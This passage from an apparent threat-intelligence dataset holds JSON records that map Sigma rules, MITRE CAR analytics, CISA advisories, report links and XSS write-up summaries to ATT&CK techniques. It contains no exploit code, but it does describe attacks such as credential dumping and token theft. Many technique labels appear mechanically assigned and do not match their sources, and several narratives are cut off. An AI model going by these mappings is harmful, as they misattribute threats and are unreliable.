"evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}, {"order": 2, "label": "Technique T1053", "narrative": "Thomas Patzke 2020-05-22 ['Unknown'] proc_creation_win_hktl_crackmapexec_execution_patterns.yml high process_creation windows ['https://github.com/byt3bl33d3r/CrackMapExec', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml'] ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1047'", "mitre_attack": [{"technique_id": "T1053"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}, {"order": 3, "label": "Technique T1059.001", "narrative": "Thomas Patzke 2020-05-22 ['Unknown'] proc_creation_win_hktl_crackmapexec_execution_patterns.yml high process_creation windows ['https://github.com/byt3bl33d3r/CrackMapExec', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml'] ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1047'", "mitre_attack": [{"technique_id": "T1059.001"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}, {"order": 4, "label": "Technique T1059.003", "narrative": "Thomas Patzke 2020-05-22 ['Unknown'] proc_creation_win_hktl_crackmapexec_execution_patterns.yml high process_creation windows ['https://github.com/byt3bl33d3r/CrackMapExec', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml'] ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1047'", "mitre_attack": [{"technique_id": "T1059.003"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json", "retrieved_at": "2026-07-10T11:21:51.176771+00:00", "license": "", "lang": "en"}, "actor": {"name": "HackTool - CrackMapExec Execution Patterns", "aliases": []}} {"chain_id": "05c81d7b3b40d3cac43171ed350c805e", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/bin_re/blog_pykspas-inferior-dga-version/link.md", "title": "blog_pykspas-inferior-dga-version", "description": "blog_pykspas-inferior-dga-version", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://bin.re/blog/pykspas-inferior-dga-version/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://bin.re/blog/pykspas-inferior-dga-version/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://bin.re/blog/pykspas-inferior-dga-version/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/bin_re/blog_pykspas-inferior-dga-version/link.md", "retrieved_at": "2026-07-10T12:21:11.483198+00:00", "license": "", "lang": "en"}} {"chain_id": "973bc95857ce0961c5d354683ee93876", "source_id": "misp_galaxy_relations", "external_id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "title": "UEFI Persistence Via Wpbbin - FileCreation", "description": "UEFI Persistence Via Wpbbin - FileCreation", "steps": [{"order": 1, "label": "Technique T1542.001", "narrative": "Nasreddine Bencherchali (Nextron Systems) 2022-07-18 ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)'] file_event_win_wpbbin_persistence.yml high file_event windows ['https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c', 'https://persistence-info.github.io/Data/wpbbin.html', 'https", "mitre_attack": [{"technique_id": "T1542.001"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json", "retrieved_at": "2026-07-10T11:21:51.139427+00:00", "license": "", "lang": "en"}, "actor": {"name": "UEFI Persistence Via Wpbbin - FileCreation", "aliases": []}} {"chain_id": "166e611ce5940ff7b9463b27b7ff7802", "source_id": "splunk_attack_data_scenarios", "external_id": "datasets/attack_techniques/T1197/atomic_red_team/atomic_red_team.yml", "title": "atomic_red_team", "description": "atomic_red_team", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "author: Michael Haag, Splunk\nid: cc9b2617-efc9-11eb-926b-550bf0943fbb\ndate: '2021-03-30'\ndescription: Execution of Atomic Red Team T1197 - BITS Jobs.\nenvironment: attack_range\ndirectory: atomic_red_team\nmitre_technique:\n- T1197\ndatasets:\n- name: crowdstrike_falcon\n path: /datasets/attack_techniques/T1197/atomic_red_team/crowdstrike_falcon.log\n sourcetype: crowdstrike:events:sensor\n source: crowdstrike\n- name: windows-sysmon\n path: /datasets/attack_techniques/T1197/atomic_red_team/windows-sysmon.log\n sourcetype: XmlWinEventLog\n source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "author: Michael Haag, Splunk\nid: cc9b2617-efc9-11eb-926b-550bf0943fbb\ndate: '2021-03-30'\ndescription: Execution of Atomic Red Team T1197 - BITS Jobs.\nenvironment: attack_range\ndirectory: atomic_red_team\nmitre_technique:\n- T1197\ndatasets:\n- name: crowdstrike_falcon\n path: /datasets/attack_techniques/T1197/atomic_red_team/crowdstrike_falcon.log\n sourcetype: crowdstrike:events:sensor\n source: crowdstrike\n- name: windows-sysmon\n path: /datasets/attack_techniques/T1197/atomic_red_team/windows-sysmon.log\n sourcetype: XmlWinEventLog\n source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "author: Michael Haag, Splunk\nid: cc9b2617-efc9-11eb-926b-550bf0943fbb\ndate: '2021-03-30'\ndescription: Execution of Atomic Red Team T1197 - BITS Jobs.\nenvironment: attack_range\ndirectory: atomic_red_team\nmitre_technique:\n- T1197\ndatasets:\n- name: crowdstrike_falcon\n path: /datasets/attack_techniques/T1197/atomic_red_team/crowdstrike_falcon.log\n sourcetype: crowdstrike:events:sensor\n source: crowdstrike\n- name: windows-sysmon\n path: /datasets/attack_techniques/T1197/atomic_red_team/windows-sysmon.log\n sourcetype: XmlWinEventLog\n source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/splunk/attack_data/tree/master/datasets/attack_techniques/T1197/atomic_red_team/atomic_red_team.yml", "retrieved_at": "2026-07-10T11:52:38.354987+00:00", "license": "Apache-2.0", "lang": "en"}} {"chain_id": "6b8c99509b19bd8f1c2b34863943e37d", "source_id": "redstack_vault_chains", "external_id": "123e4567-e89b-12d3-a456-426614174001", "title": "123e4567-e89b-12d3-a456-426614174001", "description": "A single-stage attack exploiting a reflected XSS vulnerability in the URL path of a DoD website to execute arbitrary JavaScript in the victim's browser.", "steps": [{"order": 1, "label": "Exploit-Reflected-XSS-via-URL-Path", "narrative": "A single-stage attack exploiting a reflected XSS vulnerability in the URL path of a DoD website to execute arbitrary JavaScript in the victim's browser.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Reflected-XSS-Exploitation-via-Malicious-URL-Path-on-U.S.-Department-of-Defense-Website.md", "retrieved_at": "2026-07-10T14:16:50.588113+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "38428635f1269cc1fa446626c28e4e8b", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/cert_gov_ua/article_39518/link.md", "title": "article_39518", "description": "article_39518", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://cert.gov.ua/article/39518)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://cert.gov.ua/article/39518)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://cert.gov.ua/article/39518)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/cert_gov_ua/article_39518/link.md", "retrieved_at": "2026-07-10T13:11:12.436563+00:00", "license": "", "lang": "en"}} {"chain_id": "60f8e5accec2242c6cf6d5275f530433", "source_id": "mitre_car_analytics", "external_id": "CAR-2021-05-011.yaml", "title": "Create Remote Thread into LSASS", "description": "Create Remote Thread into LSASS", "steps": [{"order": 1, "label": "CAR T1003", "narrative": "---\ntitle: Create Remote Thread into LSASS\nsubmission_date: 2021/05/11\ninformation_domain: Analytic\nplatforms:\n - Windows\nsubtypes:\n - Process\nanalytic_types:\n - TTP\ncontributors:\n - Splunk Threat Research <research@splunk.com>\nid: CAR-2021-05-011\ndescription: Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials.\ncoverage:\n - technique: T1003\n ", "mitre_attack": [{"technique_id": "T1003"}]}, {"order": 2, "label": "CAR T1003.001", "narrative": "---\ntitle: Create Remote Thread into LSASS\nsubmission_date: 2021/05/11\ninformation_domain: Analytic\nplatforms:\n - Windows\nsubtypes:\n - Process\nanalytic_types:\n - TTP\ncontributors:\n - Splunk Threat Research <research@splunk.com>\nid: CAR-2021-05-011\ndescription: Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials.\ncoverage:\n - technique: T1003\n ", "mitre_attack": [{"technique_id": "T1003.001"}]}], "provenance": {"url": "https://github.com/mitre-attack/car/blob/master/analytics/CAR-2021-05-011.yaml", "retrieved_at": "2026-07-10T11:39:00.345348+00:00", "license": "", "lang": "en"}} {"chain_id": "d096ab0c7a78f762dec79b301617036b", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/krebsonsecurity_com/2024_12_u-s-army-soldier-arrested-in-att-verizon-extortions/link.md", "title": "2024_12_u-s-army-soldier-arrested-in-att-verizon-extortions", "description": "2024_12_u-s-army-soldier-arrested-in-att-verizon-extortions", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://krebsonsecurity.com/2024/12/u-s-army-soldier-arrested-in-att-verizon-extortions/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://krebsonsecurity.com/2024/12/u-s-army-soldier-arrested-in-att-verizon-extortions/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://krebsonsecurity.com/2024/12/u-s-army-soldier-arrested-in-att-verizon-extortions/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/krebsonsecurity_com/2024_12_u-s-army-soldier-arrested-in-att-verizon-extortions/link.md", "retrieved_at": "2026-07-10T13:17:24.456807+00:00", "license": "", "lang": "en"}} {"chain_id": "1dd96b5c335d47c0739841bc89b06f04", "source_id": "cisa_aa_catalog", "external_id": "ICSA-17-334-02", "title": "GEOVAP Reliance SCADA", "description": "GEOVAP Reliance SCADA", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "GEOVAP Reliance SCADA: GEOVAP Reliance SCADA\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@c", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "GEOVAP Reliance SCADA: GEOVAP Reliance SCADA\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@c", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "GEOVAP Reliance SCADA: GEOVAP Reliance SCADA\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@c", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "GEOVAP Reliance SCADA: GEOVAP Reliance SCADA\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@c", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "GEOVAP Reliance SCADA: GEOVAP Reliance SCADA\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@c", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-17-334-02", "retrieved_at": "2026-07-09T14:00:15.784991+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "9b6c8f46ee31e44be77a886202219fbb", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/asec_ahnlab_com/ko_37764/link.md", "title": "ko_37764", "description": "ko_37764", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://asec.ahnlab.com/ko/37764/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://asec.ahnlab.com/ko/37764/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://asec.ahnlab.com/ko/37764/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/asec_ahnlab_com/ko_37764/link.md", "retrieved_at": "2026-07-10T12:19:05.764063+00:00", "license": "", "lang": "en"}} {"chain_id": "32bd183a99bcba8fc041b65fa17238f3", "source_id": "awesome_threat_intel_rss", "external_id": "http://www.darknet.org.uk/", "title": "Darknet", "description": "Darknet", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "Darknet is a group of like-minded individuals founded around 1999 sharing knowledge in password cracking, cracking, cryptography, programming (C++, VB, Delphi, C, Pascal, Assembly, Python, PERL, Bash and so on), network security, Linux, Windows, UNIX and more. Feed: http://www.darknet.org.uk/feed/", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "Darknet is a group of like-minded individuals founded around 1999 sharing knowledge in password cracking, cracking, cryptography, programming (C++, VB, Delphi, C, Pascal, Assembly, Python, PERL, Bash and so on), network security, Linux, Windows, UNIX and more. Feed: http://www.darknet.org.uk/feed/", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "Darknet is a group of like-minded individuals founded around 1999 sharing knowledge in password cracking, cracking, cryptography, programming (C++, VB, Delphi, C, Pascal, Assembly, Python, PERL, Bash and so on), network security, Linux, Windows, UNIX and more. Feed: http://www.darknet.org.uk/feed/", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "http://www.darknet.org.uk/", "retrieved_at": "2026-07-10T15:50:15.166621+00:00", "license": "", "lang": "en"}} {"chain_id": "182389c493e8d345d42384ca729ad8eb", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/hornetsecurity_com/en_security-information_firefox-send-sends-ursnif-malware/link.md", "title": "en_security-information_firefox-send-sends-ursnif-malware", "description": "en_security-information_firefox-send-sends-ursnif-malware", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/hornetsecurity_com/en_security-information_firefox-send-sends-ursnif-malware/link.md", "retrieved_at": "2026-07-10T13:16:14.421180+00:00", "license": "", "lang": "en"}} {"chain_id": "fc4387a44ccee6426191f3a90f62b1c4", "source_id": "redstack_vault_chains", "external_id": "ac-subdomain-takeover-wordpress", "title": "ac-subdomain-takeover-wordpress", "description": "Demonstrates discovery and confirmation of a subdomain takeover vulnerability through misconfigured DNS records pointing to an abandoned WordPress.com subdomain, enabling potential control and malicious hosting.", "steps": [{"order": 1, "label": "Detect-and-Confirm-Subdomain-Takeover", "narrative": "Demonstrates discovery and confirmation of a subdomain takeover vulnerability through misconfigured DNS records pointing to an abandoned WordPress.com subdomain, enabling potential control and malicious hosting.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Subdomain-Takeover-via-Dangling-CNAME-on-WordPress-Subdomain.md", "retrieved_at": "2026-07-10T14:20:00.728552+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "9b432a4ce3f0a4efee9a1570b174f72b", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/blogs_juniper_net/en-us_threat-research_sysrv-botnet-expands-and-gains-persistence/link.md", "title": "en-us_threat-research_sysrv-botnet-expands-and-gains-persistence", "description": "en-us_threat-research_sysrv-botnet-expands-and-gains-persistence", "steps": [{"order": 1, "label": "Technique T1071", "narrative": "[Link to the article](https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 2, "label": "Technique T1547", "narrative": "[Link to the article](https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence)\n", "mitre_attack": [{"technique_id": "T1547"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/blogs_juniper_net/en-us_threat-research_sysrv-botnet-expands-and-gains-persistence/link.md", "retrieved_at": "2026-07-10T13:11:01.166113+00:00", "license": "", "lang": "en"}} {"chain_id": "fd551925b6040be6fc650fdf9c389ae2", "source_id": "cisa_aa_catalog", "external_id": "ICSA-21-042-01", "title": "Multiple Embedded TCP/IP Stacks (Update B)", "description": "Multiple Embedded TCP/IP Stacks (Update B)", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "Multiple Embedded TCP/IP Stacks (Update B): Multiple Embedded TCP/IP Stacks (Update B)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "Multiple Embedded TCP/IP Stacks (Update B): Multiple Embedded TCP/IP Stacks (Update B)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "Multiple Embedded TCP/IP Stacks (Update B): Multiple Embedded TCP/IP Stacks (Update B)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "Multiple Embedded TCP/IP Stacks (Update B): Multiple Embedded TCP/IP Stacks (Update B)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "Multiple Embedded TCP/IP Stacks (Update B): Multiple Embedded TCP/IP Stacks (Update B)\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-21-042-01", "retrieved_at": "2026-07-09T14:00:15.794125+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "b4c746fb00aedff259e8416d836808fb", "source_id": "mitre_attack_procedure_examples", "external_id": "T1557.004", "title": "Evil Twin", "description": "Evil Twin", "steps": [{"order": 1, "label": "Technique T1040", "narrative": "Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin) Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networ", "mitre_attack": [{"technique_id": "T1040"}]}, {"order": 2, "label": "Technique T1056", "narrative": "Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin) Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networ", "mitre_attack": [{"technique_id": "T1056"}]}, {"order": 3, "label": "Technique T1565", "narrative": "Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin) Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networ", "mitre_attack": [{"technique_id": "T1565"}]}], "provenance": {"url": "https://attack.mitre.org/techniques/T1557/004", "retrieved_at": "2026-07-10T14:11:04.907912+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "0632d4823ca91076e148a27f62a32271", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/googleprojectzero_blogspot_com/2023_08_summary-mte-as-implemented_html/link.md", "title": "2023_08_summary-mte-as-implemented_html", "description": "2023_08_summary-mte-as-implemented_html", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/googleprojectzero_blogspot_com/2023_08_summary-mte-as-implemented_html/link.md", "retrieved_at": "2026-07-10T13:16:08.730946+00:00", "license": "", "lang": "en"}} {"chain_id": "c9df3007019a12077bff819e57e65b22", "source_id": "mitre_attack_procedure_examples", "external_id": "T1585.003", "title": "Cloud Accounts", "description": "Cloud Accounts", "steps": [{"order": 1, "label": "Technique T1567", "narrative": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nC", "mitre_attack": [{"technique_id": "T1567"}]}, {"order": 2, "label": "Technique T1583", "narrative": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nC", "mitre_attack": [{"technique_id": "T1583"}]}, {"order": 3, "label": "Technique T1585", "narrative": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nC", "mitre_attack": [{"technique_id": "T1585"}]}, {"order": 4, "label": "Technique T1608", "narrative": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nC", "mitre_attack": [{"technique_id": "T1608"}]}], "provenance": {"url": "https://attack.mitre.org/techniques/T1585/003", "retrieved_at": "2026-07-10T14:11:04.933899+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "373889f5274db1fc6ec1996fc3b5e9b8", "source_id": "trend_micro_research", "external_id": "https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html", "title": "Guess Who’s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024", "description": "Guess Who’s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024", "steps": [{"order": 1, "label": "Malware on Initial Access", "narrative": "ROAMINGMOUSE The macro-enabled document we created for initial access in this campaign is called \"ROAMINGMOUSE.\" This document acts as a dropper for components related to ANEL. The primary role of ROAMINGMOUSE is to execute the subsequent ANEL payload while minimizing the chances of detection. To achieve this, it implements various evasion techniques. (Basic) Sandbox Evasion The ROAMINGMOUSE variant introduced in Case 1 requires the user to enable macros. This variant includes a feature that initiates malicious activity based on specific mouse movements made by the user. This functionality is achieved by implementing a function that responds to the \"MouseMove\" event, triggered when the mouse hovers over a user form embedded within the document.", "mitre_attack": [{"technique_id": "T1190"}, {"technique_id": "T1204.002"}]}], "provenance": {"url": "https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html", "retrieved_at": "2026-07-09T15:14:01.812363+00:00", "license": "", "lang": "en"}} {"chain_id": "76ade9984c03d1d7db7eda5847bb3bfe", "source_id": "redstack_vault_chains", "external_id": "19647061-a40a-4ecf-a808-0aec54777721", "title": "19647061-a40a-4ecf-a808-0aec54777721", "description": "A stored Cross-site Scripting (XSS) vulnerability in the DigitalSellz public profile feature bypasses protections, allowing attackers to inject malicious JavaScript that executes when users view the profile, leading to the theft of Facebook access tokens for unauthorized account access.", "steps": [{"order": 1, "label": "Inject-Stored-XSS-Payload-in-Public-Profile", "narrative": "A stored Cross-site Scripting (XSS) vulnerability in the DigitalSellz public profile feature bypasses protections, allowing attackers to inject malicious JavaScript that executes when users view the profile, leading to the theft of Facebook access tokens for unauthorized account access.", "mitre_attack": []}, {"order": 2, "label": "Steal-Facebook-Access-Token-via-XSS", "narrative": "A stored Cross-site Scripting (XSS) vulnerability in the DigitalSellz public profile feature bypasses protections, allowing attackers to inject malicious JavaScript that executes when users view the profile, leading to the theft of Facebook access tokens for unauthorized account access.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Stored-XSS-in-DigitalSellz-Public-Profile-to-Steal-Facebook-Access-Tokens.md", "retrieved_at": "2026-07-10T14:19:12.903006+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "44de1c06d9b5be1a49a4a9d2319dabf7", "source_id": "splunk_attack_data_scenarios", "external_id": "datasets/attack_techniques/T1098.002/full_access_as_app_permission_assigned/full_access_as_app_permission_assigned.yml", "title": "full_access_as_app_permission_assigned", "description": "full_access_as_app_permission_assigned", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "author: Mauricio Velazco\nid: 6cd62088-3b97-40d2-9469-769e09fbf085\ndate: 